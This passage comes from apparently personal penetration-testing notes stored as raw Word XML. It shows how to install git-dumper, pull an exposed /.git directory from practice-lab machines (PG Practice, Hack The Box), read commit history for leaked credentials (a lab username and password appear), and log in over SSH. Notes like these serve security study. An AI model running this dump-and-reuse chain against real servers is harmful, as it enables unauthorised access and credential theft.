      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pipx ensurepath</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pipx install git-dumper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can know use it since it's added to PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to use git-dumper:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="754"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir /new_dir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="754"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make new directory to hold this git repo </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="754"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git-dumper http://192.168.236.144/.git /path/to/folder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="754"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/path/to/folder </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with path to file where you want the contents to be dumped</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="754"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I recommend making a new directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to interact with the git folder:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you download it locally, you can enumerate the git logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look through the log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git log -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is like git log and git show combined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It shows all the logs and also all the changes between each log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can then scroll through the output, since it's a lot of output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OR you can do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git show &lt;id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Where the id is of the most recent commit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Both methods of looking at log show the credentials</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> stuart : BreakingBad92</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4762500" cy="1790700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="100" name="image103.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image103.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1114"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="47625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32D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh stuart@192.168.236.144</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D7">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1115">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Bullybox</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice when we found a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/.git/ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1116">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BitForce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice when we found a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/.git/ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As introduced in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pilgrimage HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, if we find a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/.git/ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory in the web server, even if we are not able to access the website (403 Forbidden Error), we can dump its contents and</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">recreate the repository using a tool such as git-dumper.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git-dumper </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://pilgrimage.htb/ ./destination_directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No need to tell git-dumper the exact path to the /.git directory. But, here for example, the /.git directory is only one directory nested, so try and do that so that the git-dumper has an easy time finding it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./destination_directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with your own </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032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2EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032EC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
